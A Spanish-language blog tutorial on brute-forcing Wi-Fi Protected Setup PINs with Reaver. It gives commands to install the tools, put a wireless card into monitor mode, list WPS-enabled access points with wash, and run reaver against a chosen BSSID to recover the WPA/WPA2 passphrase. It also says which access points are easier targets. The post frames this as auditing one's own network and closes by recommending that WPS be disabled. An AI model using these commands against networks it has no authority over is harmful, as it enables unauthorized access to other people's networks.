Chatear en RedIrc

domingo, 17 de abril de 2016

Reaver, acceder a Wireless con WPS por fuerza bruta

Uso de reaver en wireless con WPS
Reaver implementa un ataque de fuerza bruta contra Wi-Fi Protected Setup (WPS) que puede romper el PIN WPS de un punto de acceso en cuestión de horas y posteriormente recuperar la contraseña WPA/WPA2.

Las posibles combinaciones ascienden a unos cientos de millones, pero se ha descubierto que enviando únicamente los 4 primeros dígitos del PIN a APs con WPS activo se consigue una respuesta bajando las posibilidades a unas 11.000 combinaciones posibles por lo que el tiempo se reduce a apenas 1 horas.

Para testear nuestra red Wireless vamos a instalamos reaver desde los repositorios de Ubuntu:
sudo apt install reaver
Como buen complemento para realizar auditorias wireless descargaremos y compilaremos la ultima versión de aircrack desde su repositorio git con todos sus funcionalidades:
sudo apt install git build-essential {libgcrypt20,libssl,libsqlite3,libpcap}-dev
sudo apt install libnl-genl-3-dev libnl-3-dev
git clone https://github.com/aircrack-ng/aircrack-ng.git
cd aircrack-ng
make sqlite=true experimental=true ext_scripts=true
sudo make sqlite=true experimental=true ext_scripts=true install
Iniciamos el modo monitor para usar reaver:
sudo airmon-ng start wlan0
[update headline="WLAN"]Sustituir wlan0 por el que uséis vosotros a través del comando iwconfig. [/update]
Antes debemos de crear el directorio reaver, no se por que no lo hace la aplicación pero si no existe el directorio no sale nada:
sudo mkdir /etc/reaver
Para empezar a usar primero reaver buscaremos primero los APs con el WPS activo usando wash:
sudo wash -i mon0
[warning headline="FCS"]Si os sale el mensaje "[!] Found packet with bad FCS, skipping..." añadir el parámetro -C[/warning]
Todos los APs que salgan son vulnerables y más fáciles, fijaros que no salga mejor el "WPS Locked" ya que estos APs bloquean cuando se supera un numero X de intentos fallidos:

salida del comando wash

Una vez detectado nuestro destino copiamos la BSSID de este y ejecutamos reaver, por ejemplo:
sudo reaver -i mon0 -b 00:11:22:33:44:55 -v --auto
El parámetro --auto detecta las mejores opciones avanzadas para el punto de acceso. Pasado un tiempo obtendremos el PIN y la clave de paso de la red Wireless aun que sea WPA2-AES.

Con esto lo que hacemos es probar nuestro AP y ser testigos del problema del WPS, es conveniente deshabilitar para evitar esto. Algunos APs tienen un botón para deshabilitar el WPS, si no lo tiene tendréis que entrar por web y quitarlo.

No hay comentarios:

Publicar un comentario